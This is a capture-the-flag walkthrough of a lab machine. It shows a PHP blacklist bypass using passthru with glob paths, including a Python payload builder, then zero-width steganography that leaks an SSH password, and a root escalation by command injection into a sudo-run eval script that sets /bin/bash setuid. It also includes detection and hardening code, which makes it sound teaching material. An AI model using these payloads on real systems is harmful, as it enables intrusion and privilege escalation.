Mazesec_Ftc

Source: QQ group 660930334

Difficulty: Low

I. Information gathering

1. Host discovery

┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-05 09:55 CST
Nmap scan report for 192.168.2.1
Host is up (0.00061s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00053s latency).
MAC Address: 08:00:27:02:7F:AE (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.106
Host is up (0.00085s latency).
MAC Address: 08:00:27:C9:A1:AB (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.02 seconds

Target IP: 192.168.2.106

2. Port scanning

1) Full TCP port scan

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.106
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-05 09:55 CST
Nmap scan report for 192.168.2.106
Host is up (0.00044s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
MAC Address: 08:00:27:C9:A1:AB (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.93 seconds

Open ports: 22, 80, 8080

2) Service and version scan

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,8080 192.168.2.106
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-05 09:56 CST
Nmap scan report for 192.168.2.106
Host is up (0.0011s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http (PHP 8.2.29)
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Date: Wed, 07 Jan 2026 06:59:51 GMT
| Connection: close
| X-Powered-By: PHP/8.2.29
| Content-type: text/html; charset=UTF-8
| <code><span style="color: #000000">
| <span style="color: #0000BB">&lt;?php
| />error_reporting</span><span style="color: #007700">(</span><span style="color: #0000BB">0</span><span style="color: #007700">);
| /></span><span style="color: #0000BB">highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);
| /></span><span style="color: #FF8000">//&nbsp;
| flag
| /></span><span style="color: #0000BB">$funtion&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'function'</span><span style="color: #007700">];
|_ /></span><span style="color: #0000BB">
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
8080/tcp open http (PHP 8.2.29)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| fingerprint-strings:
| GetRequest:
| HTTP/1.0 200 OK
| Date: Wed, 07 Jan 2026 06:59:51 GMT
| Connection: close
| X-Powered-By: PHP/8.2.29
|_ Content-type: text/html; charset=UTF-8
|_http-open-proxy: Proxy might be redirecting requests
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.94SVN%I=7%D=1/7%Time=695E0468%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,80E,"HTTP/1\.0\x20200\x20OK\r\nDate:\x20Wed,\x2007\x20Jan\x202
SF:026\x2006:59:51\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:\x20PHP/
SF:8\.2\.29\r\nContent-type:\x20text/html;\x20charset=UTF-8\r\n\r\n<code><
SF:span\x20style=\"color:\x20#000000\">\n<span\x20style=\"color:\x20#0000B
SF:B\">&lt;\?php\r<br\x20/>error_reporting</span><span\x20style=\"color:\x
SF:20#007700\">\(</span><span\x20style=\"color:\x20#0000BB\">0</span><span
SF:\x20style=\"color:\x20#007700\">\);\r<br\x20/></span><span\x20style=\"c
SF:olor:\x20#0000BB\">highlight_file</span><span\x20style=\"color:\x20#007
SF:700\">\(</span><span\x20style=\"color:\x20#0000BB\">__FILE__</span><spa
SF:n\x20style=\"color:\x20#007700\">\);\r<br\x20/></span><span\x20style=\"
SF:color:\x20#FF8000\">//&nbsp;\xe6\xa0\xb9\xe7\x9b\xae\xe5\xbd\x95\xe4\xb
SF:8\x8b\xe7\x9a\x84flag\r<br\x20/></span><span\x20style=\"color:\x20#0000
SF:BB\">\$funtion&nbsp;</span><span\x20style=\"color:\x20#007700\">=&nbsp;
SF:</span><span\x20style=\"color:\x20#0000BB\">\$_POST</span><span\x20styl
SF:e=\"color:\x20#007700\">\[</span><span\x20style=\"color:\x20#DD0000\">'
SF:function'</span><span\x20style=\"color:\x20#007700\">\];\r<br\x20/></sp
SF:an><span\x20style=\"color:\x20#0000BB\">")%r(HTTPOptions,80E,"HTTP/1\.0
SF:\x20200\x20OK\r\nDate:\x20Wed,\x2007\x20Jan\x202026\x2006:59:51\x20GMT\
SF:r\nConnection:\x20close\r\nX-Powered-By:\x20PHP/8\.2\.29\r\nContent-typ
SF:e:\x20text/html;\x20charset=UTF-8\r\n\r\n<code><span\x20style=\"color:\
SF:x20#000000\">\n<span\x20style=\"color:\x20#0000BB\">&lt;\?php\r<br\x20/
SF:>error_reporting</span><span\x20style=\"color:\x20#007700\">\(</span><s
SF:pan\x20style=\"color:\x20#0000BB\">0</span><span\x20style=\"color:\x20#
SF:007700\">\);\r<br\x20/></span><span\x20style=\"color:\x20#0000BB\">high
SF:light_file</span><span\x20style=\"color:\x20#007700\">\(</span><span\x2
SF:0style=\"color:\x20#0000BB\">__FILE__</span><span\x20style=\"color:\x20
SF:#007700\">\);\r<br\x20/></span><span\x20style=\"color:\x20#FF8000\">//&
SF:nbsp;\xe6\xa0\xb9\xe7\x9b\xae\xe5\xbd\x95\xe4\xb8\x8b\xe7\x9a\x84flag\r
SF:<br\x20/></span><span\x20style=\"color:\x20#0000BB\">\$funtion&nbsp;</s
SF:pan><span\x20style=\"color:\x20#007700\">=&nbsp;</span><span\x20style=\
SF:"color:\x20#0000BB\">\$_POST</span><span\x20style=\"color:\x20#007700\"
SF:>\[</span><span\x20style=\"color:\x20#DD0000\">'function'</span><span\x
SF:20style=\"color:\x20#007700\">\];\r<br\x20/></span><span\x20style=\"col
SF:or:\x20#0000BB\">");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8080-TCP:V=7.94SVN%I=7%D=1/7%Time=695E0468%P=x86_64-pc-linux-gnu%r(
SF:GetRequest,902,"HTTP/1\.0\x20200\x20OK\r\nDate:\x20Wed,\x2007\x20Jan\x2
SF:02026\x2006:59:51\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:\x20PH
SF:P/8\.2\.29\r\nContent-type:\x20text/html;\x20charset=UTF-8\r\n\r\n\xe5\
SF:x8f\xaf\xe6\x83\x9c\xe6\xb2\xa1\xe5\xa6\x82\xe6\x9e\x9c\r\n\xe6\x9e\x97
SF:\xe4\xbf\x8a\xe6\x9d\xb0\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8
SF:c\xe2\x80\x8d\xef\xbb\xbf\xe2\x80\xac\xe2\x80\x8c\r\n\xe5\x81\x87\xe5\x
SF:a6\x82\xe6\x8a\x8a\xe7\x8a\xaf\xe5\xbe\x97\xe8\xb5\xb7\xe7\x9a\x84\xe9\
SF:x94\x99\r\n\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8d
SF:\xe2\x80\xac\xef\xbb\xbf\xe2\x80\x8d\xe8\x83\xbd\xe9\x94\x99\xe7\x9a\x8
SF:4\xe9\x83\xbd\xe9\x94\x99\xe8\xbf\x87\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x
SF:8c\xe2\x80\x8c\xe2\x80\x8d\xe2\x80\xac\xe2\x80\x8d\xef\xbb\xbf\r\n\xe5\
SF:xba\x94\xe8\xaf\xa5\xe8\xbf\x98\xe6\x9d\xa5\xe5\xbe\x97\xe5\x8f\x8a\xe5
SF:\x8e\xbb\xe6\x82\x94\xe8\xbf\x87\r\n\xe5\x81\x87\xe5\xa6\x82\xe6\xb2\xa
SF:1\xe6\x8a\x8a\xe4\xb8\x80\xe5\x88\x87\xe8\xaf\xb4\xe7\xa0\xb4\r\n\xe9\x
SF:82\xa3\xe4\xb8\x80\xe5\x9c\xba\xe5\xb0\x8f\xe9\xa3\x8e\xe6\xb3\xa2\xe5\
SF:xb0\x86\xe4\xb8\x80\xe7\xac\x91\xe5\xb8\xa6\xe8\xbf\x87\r\n\xe2\x80\x8c
SF:\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8d\xe2\x80\xac\xef\xbb\xb
SF:f\xe2\x80\x8d\xe5\x9c\xa8\xe6\x84\x9f\xe6\x83\x85\xe9\x9d\xa2\xe5\x89\x
SF:8d\xe8\xae\xb2\xe4\xbb\x80\xe4\xb9\x88\xe8\x87\xaa\xe6\x88\x91\xe2\x80\
SF:x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8d\xef\xbb\xbf\xe2\x80
SF:\xac\xe2\x80\x8c\r\n\xe8\xa6\x81\xe5\xbe\x97\xe8\xbf\x87\xe4\xb8\x94\xe
SF:8\xbf\x87\xe6\x89\x8d\xe5\xa5\xbd\xe8\xbf\x87\r\n\xe5\x85\xa8\xe9\x83\x
SF:bd\xe6\x80\xaa\xe6\x88\x91\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\
SF:x8c\xe2\x80\x8d\xe2\x80\xac\xe2\x80\xac\xe2\x80\xac\r\n\xe4\xb8\x8d\xe8
SF:\xaf\xa5\xe6\xb2\x89\xe9\xbb\x98\xe6\x97\xb6\xe6\xb2\x89\xe9\xbb\x98\xe
SF:8\xaf\xa5\xe5\x8b\x87\xe6\x95\xa2\xe6\x97\xb6\xe8\xbd\xaf\xe5\xbc\xb1\r
SF:\n\xe5\xa6\x82\xe6\x9e\x9c\xe4\xb8\x8d\xe6\x98\xaf\xe6\x88\x91\r\n\xe8\
SF:xaf\xaf\xe4\xbc\x9a\xe8\x87\xaa\xe5\xb7\xb1\xe6\xb4\x92\xe8\x84\xb1\xe8
SF:\xae\xa9\xe6\x88\x91\xe4\xbb\xac\xe9\x9a\xbe\xe8\xbf\x87\xe2\x80\x8c\xe
SF:2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8d\xef\xbb\xbf\xe2\x80\x8c\x
SF:ef\xbb\xbf\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\
SF:xef\xbb\xbf\xe2\x80\xac\xe2\x80\xac\r\n\xe5\x8f\xaf\xe5\xbd\x93\xe5\x88
SF:\x9d\xe7\x9a\x84\xe4\xbd\xa0\xe5\x92\x8c\xe7\x8e\xb0\xe5\x9c\xa8\xe7\x9
SF:a\x84\xe6\x88\x91\r\n\xe5\x81\x87\xe5\xa6\x82\xe9\x87\x8d\xe6\x9d\xa5\x
SF:e8\xbf\x87\r\n\xe5\x80\x98\xe8\x8b\xa5\xe9\x82\xa3\xe5\xa4\xa9\r\n\xe2\
SF:x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8d\xe2\x80\x8d\xe2
SF:\x80\x8c\xef\xbb\xbf\xe6\x8a\x8a\xe8\xaf\xa5\xe8\xaf\xb4\xe7\x9a\x84\xe
SF:8\xaf\x9d\xe5\xa5\xbd\xe5\xa5\xbd\xe8\xaf\xb4\r\n\xe8\xaf\xa5\xe4\xbd\x
SF:93\xe8\xb0\x85\xe7\x9a\x84\xe4\xb8\x8d\xe6\x89\xa7\xe7\x9d\x80\r\n\xe5\
SF:xa6\x82\xe6\x9e\x9c\xe9\x82\xa3\xe5\xa4\xa9\xe6\x88\x91\r\n\xe4\xb8\x8d
SF:\xe5\x8f\x97\xe6\x83\x85\xe7\xbb\xaa\xe6\x8c\x91\xe6\x8b\xa8\xe2\x80\x8
SF:c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8d\xef\xbb\xbf\xe2\x80\x
SF:ac\xe2\x80\x8d\r\n\xe4\xbd\xa0\xe4\xbc\x9a\xe6\x80\x8e\xe4\xb9\x88\xe5\
SF:x81\x9a\r\n\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8d
SF:\xe2\x80\xac\xe2\x80\x8c\xe2\x80\x8d");
MAC Address: 08:00:27:C9:A1:AB (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.20 seconds

3) UDP scan

┌──(root㉿kali)-[/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.106
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-05 09:57 CST
Nmap scan report for 192.168.2.106
Host is up (0.0018s latency).
All 100 scanned ports on 192.168.2.106 are in ignored states.
Not shown: 57 closed udp ports (port-unreach), 43 open|filtered udp ports (no-response)
MAC Address: 08:00:27:C9:A1:AB (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 54.57 seconds

II. Web exploitation

1. Port 80

Port 80 serves a PHP page that prints its own source with highlight_file() and then calls a request-controlled function name with a request-controlled argument:

<?php
error_reporting(0);
highlight_file(__FILE__);
// the flag is under the root directory
$funtion = $_POST['function'];   // function name to call, straight from the request
$args = $_POST['args'];          // the single argument it is called with

// Blacklist 1: four function-name substrings. Blacklist 2: words (cat, ls, more, head,
// grep, sort, less), single letters (f, l, g, r, n, e, ph) and the characters \ _ ~ * ? $
// anywhere in the argument. Both checks are case-insensitive (/i).
if(!preg_match("/system|exec|eval|phpinfo/i",$funtion)&&!preg_match("/(cat|ls|f|l|g|more|head|grep|r|sort|ph|n|less|e|[\\\_~*?\$])/i",$args)){
    $funtion($args);   // dynamic call: any function not matched by blacklist 1 runs here
}
else {
    echo "nonono";
}

Looking at the filters: the function name is only rejected if it contains system, exec, eval or phpinfo, so passthru, which hands its argument to /bin/sh, is not blocked. Confirm command execution:

function=passthru&args=id

Now read the flag under /. The argument filter rejects the letters f, l and g (so the name flag cannot appear literally), the words cat and ls, and the wildcards * and ?, but not [, ] or -, so a bracket glob that the shell spawned by passthru expands to /flag gets through, with tac standing in for the blocked cat:

function=passthru&args=tac /[a-z][a-z]a[a-z]


Found the FLAG: LlB45/KQFm
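As an added example (not code from the write-up), here is a local model of the two preg_match blacklists above together with a helper that rewrites a path into a bracket glob the argument filter accepts. Only the two regexes are taken from the page; the function names, the per-letter [a-z] rewriting rule and the send() helper are this example's own.

```python
import re
import urllib.parse
import urllib.request

# Transcribed from the PHP source shown on port 80 (both checks use the /i flag).
FUNC_BLACKLIST = re.compile(r"system|exec|eval|phpinfo", re.I)
ARGS_BLACKLIST = re.compile(
    r"(cat|ls|f|l|g|more|head|grep|r|sort|ph|n|less|e|[\\_~*?$])", re.I)


def passes_filter(function: str, args: str) -> bool:
    """True when the PHP would reach $funtion($args) instead of printing nonono."""
    return not FUNC_BLACKLIST.search(function) and not ARGS_BLACKLIST.search(args)


def glob_path(path: str) -> str:
    """Replace every character that trips ARGS_BLACKLIST (on its own, or as the
    first letter of a blocked word such as cat/ls) with a bracket range. '[', ']'
    and '-' are not blacklisted, and the shell passthru() spawns expands the glob
    back to the real filename. Raises for blocked non-letters such as '_'."""
    out = path
    while True:
        m = ARGS_BLACKLIST.search(out)
        if m is None:
            return out
        ch = out[m.start()]
        if ch.islower():
            repl = "[a-z]"
        elif ch.isupper():
            repl = "[A-Z]"
        else:
            raise ValueError(f"cannot glob away {ch!r} in {path!r}")
        out = out[:m.start()] + repl + out[m.start() + 1:]


def build_payload(function: str, command: str, path: str) -> dict:
    """Form body for the POST; raises if the filter would still reject it."""
    args = f"{command} {glob_path(path)}"
    if not passes_filter(function, args):
        raise ValueError(f"still blocked: function={function!r} args={args!r}")
    return {"function": function, "args": args}


def send(url: str, payload: dict, timeout: float = 10) -> str:
    """POST the form and return the response body (network; not used offline)."""
    data = urllib.parse.urlencode(payload).encode()
    with urllib.request.urlopen(url, data=data, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # 'cat /flag' is rejected (cat, f, l, g); 'tac' plus a globbed path gets through.
    print(passes_filter("passthru", "cat /flag"))
    payload = build_payload("passthru", "tac", "/flag")
    print(payload)
    # print(send("http://192.168.2.106/", payload))  # the target from this write-up
```

glob_path() re-checks the whole string after each substitution, so multi-letter entries in the blacklist (cat in /cat, ls in /tmp/ls) are caught as well as single letters; a path containing a blocked non-letter such as _ cannot be globbed away with a bracket range and is reported instead.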

2. Port 8080

Port 8080 serves song lyrics.

The hint is zero-width-character steganography (Unicode Steganography with Zero-Width Characters). The nmap fingerprint above already shows the carrier: U+200C, U+200D, U+202C and U+FEFF interleaved with the lyric text, all of which render as nothing in a browser.

Decoding the hidden text gives: xmgmxjs:SyalwLO+pmWicb......

Appending the FLAG from port 80 produces a full credential: xmgmxjs:SyalwLO+pmWicbLlB45/KQFm
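As an added example (not the online tool the write-up used, and not code from the page), the following extracts, counts and decodes zero-width characters. The four code points are the ones visible in the nmap fingerprint of port 8080; treating them as base-4 digits 0..3 with four digits per UTF-8 byte is this example's own, hypothetical scheme, so decode() will not reproduce the tool's output for the real lyrics. The cover text is constructed.

```python
import unicodedata

# U+200C ZWNJ, U+200D ZWJ, U+202C PDF, U+FEFF ZWNBSP -> digits 0..3 (assumed mapping)
ALPHABET = "\u200c\u200d\u202c\ufeff"
DIGIT = {c: i for i, c in enumerate(ALPHABET)}


def is_zero_width(ch):
    """Any Unicode 'format' (Cf) character renders as nothing; in plain lyrics it is suspect."""
    return unicodedata.category(ch) == "Cf"


def split_hidden(text):
    """Separate the visible text from the invisible carrier characters, order kept."""
    visible, hidden = [], []
    for ch in text:
        (hidden if is_zero_width(ch) else visible).append(ch)
    return "".join(visible), "".join(hidden)


def report(text):
    """Detection view: which zero-width code points occur, and how often."""
    counts = {}
    for ch in text:
        if is_zero_width(ch):
            key = f"U+{ord(ch):04X}"
            counts[key] = counts.get(key, 0) + 1
    return counts


def encode(secret):
    """UTF-8 bytes -> base-4 digits (most significant first) -> zero-width characters."""
    return "".join(ALPHABET[(b >> shift) & 3]
                   for b in secret.encode("utf-8")
                   for shift in (6, 4, 2, 0))


def decode(hidden):
    """Inverse of encode(); carrier characters outside ALPHABET are ignored."""
    digits = [DIGIT[c] for c in hidden if c in DIGIT]
    usable = len(digits) - len(digits) % 4
    data = bytes((digits[i] << 6) | (digits[i + 1] << 4) | (digits[i + 2] << 2) | digits[i + 3]
                 for i in range(0, usable, 4))
    return data.decode("utf-8", errors="replace")


def hide(cover, secret):
    """Put one carrier character after each cover character; whatever is left of the
    payload (secret longer than cover) is appended at the end."""
    payload = encode(secret)
    out = []
    for i, ch in enumerate(cover):
        out.append(ch)
        if i < len(payload):
            out.append(payload[i])
    out.append(payload[len(cover):])
    return "".join(out)


if __name__ == "__main__":
    cover = "line one of the song\nline two of the song"   # constructed cover text
    stego = hide(cover, "xmgmxjs:demo")
    print(repr(stego))                 # reads like the cover, but is longer
    print(report(stego))               # which invisible code points are present
    visible, hidden = split_hidden(stego)
    print(visible == cover, decode(hidden))
```

report() is the part worth keeping for detection: a page of lyrics has no legitimate reason to contain hundreds of U+200C/U+200D/U+202C/U+FEFF characters, and a count of Cf code points flags the carrier before any decoding scheme is guessed.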

III. Getting a shell as xmgmxjs

Log in over SSH with that credential:

┌──(root㉿kali)-[/miaosec]
└─# ssh xmgmxjs@192.168.2.106
xmgmxjs@FCT:~$ id
uid=1000(xmgmxjs) gid=1000(xmgmxjs) groups=1000(xmgmxjs)

IV. Privilege escalation

Check sudo -l:

xmgmxjs@FCT:~$ sudo -l
Matching Defaults entries for xmgmxjs on FCT:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for xmgmxjs:
Defaults!/usr/bin/sqlmap, !/usr/bin/sqlmap *--tamper* env_reset

User xmgmxjs may run the following commands on FCT:
(root) NOPASSWD: /usr/bin/sqlmap, !/usr/bin/sqlmap *--tamper*
(ALL) NOPASSWD: /opt/123.sh

Look at /opt/123.sh:

xmgmxjs@FCT:~$ grep . /opt/123.sh 
#!/bin/bash
if [ "${#1}" -eq 2 ]; then
eval cat $1.hidden
fi
if [ "${#1}" -gt 2 ]; then
eval echo \${FTC_${1}:-$HOME}
fi

The script branches on the length of $1: exactly 2 characters goes to eval cat $1.hidden, more than 2 goes to eval echo \${FTC_${1}:-$HOME}. In the second branch the shell substitutes ${1} into the text before eval parses it, so an argument such as 1};id;# makes the line eval sees start with echo ${FTC_1};id;#. The } closes the parameter expansion early, ;id runs as a separate command, and # turns the remaining :-$HOME} into a comment. Because the script is run through sudo, the injected command runs as root:

xmgmxjs@FCT:~$ sudo /opt/123.sh '1};id;#'

uid=0(root) gid=0(root) groups=0(root)

Get root: use the same injection to set the setuid bit on /bin/bash, then start it with -p so it keeps the effective uid 0:

xmgmxjs@FCT:~$ sudo /opt/123.sh '1};chmod +s /bin/bash;#'

xmgmxjs@FCT:~$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash

xmgmxjs@FCT:~$ /bin/bash -p
bash-5.0# id
uid=1000(xmgmxjs) gid=1000(xmgmxjs) euid=0(root) egid=0(root) groups=0(root),1000(xmgmxjs)
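
As an added example (not the target's script), the following models the "more than 2 characters" branch of /opt/123.sh: it shows the exact text eval receives for a given $1, runs that branch under a real /bin/sh with a harmless echo in place of id or chmod (no sudo involved), and contrasts it with a lookup that validates the name before using it. The $HOME value and the FTC_* variable names are assumed.

```python
import re
import shutil
import subprocess

HOME = "/root"   # assumed value of $HOME when the script runs under sudo

# The branch from the script:   eval echo \${FTC_${1}:-$HOME}
VULNERABLE_BRANCH = 'if [ "${#1}" -gt 2 ]; then eval echo \\${FTC_${1}:-$HOME}; fi'


def eval_text(arg, home=HOME):
    """What eval is handed: the shell substitutes ${1} and $HOME into the text
    first, and only afterwards does eval parse the result as a command line."""
    return f"echo ${{FTC_{arg}:-{home}}}"


def run_vulnerable_branch(arg):
    """Execute the real branch under /bin/sh with arg as $1 (no sudo).
    Returns stdout, or None when no POSIX sh is available on this machine."""
    sh = shutil.which("sh")
    if sh is None:
        return None
    res = subprocess.run([sh, "-c", VULNERABLE_BRANCH, "123.sh", arg],
                         capture_output=True, text=True)
    return res.stdout


NAME_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def safe_lookup(arg, env, home=HOME):
    """Hardened equivalent of the branch: accept only an identifier, then look the
    variable up by name. Nothing from the caller is ever re-parsed as shell code.
    (In bash the same idea is name="FTC_$1"; printf '%s\\n' "${!name:-$HOME}".)"""
    if not NAME_RE.fullmatch(arg):
        raise ValueError(f"rejected name: {arg!r}")
    return env.get(f"FTC_{arg}", home)


if __name__ == "__main__":
    # Same payload shape as the write-up ('1};id;#'), with echo instead of id.
    payload = "1};echo INJECTED;#"
    print(eval_text(payload))                 # the '}' ends the expansion, ';' starts a command
    print(repr(run_vulnerable_branch(payload)))
    print(safe_lookup("demo", {"FTC_demo": "hello"}))
    try:
        safe_lookup(payload, {})
    except ValueError as e:
        print(e)
```

The fix is not a longer blacklist of characters: as long as user input is pasted into text that eval then parses, every quoting trick becomes an injection. Validating that $1 is an identifier and expanding the variable by name removes the parse step entirely, which is what safe_lookup() does.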

V. Flags

bash-5.0# tac /root/root.txt /home/xmgmxjs/user.txt 
flag{root-jyt/DLUwE8JEy2v5EuykzPeL}
flag{user-JLUSoJGCnTndpKfYIcPT0AZa}

Mazesec_Ftc
http://miao-sec.github.io/Maze-sec/Mazesec_Ftc/
Author: Miao
Published: 9 January 2026
License: BY-MIAO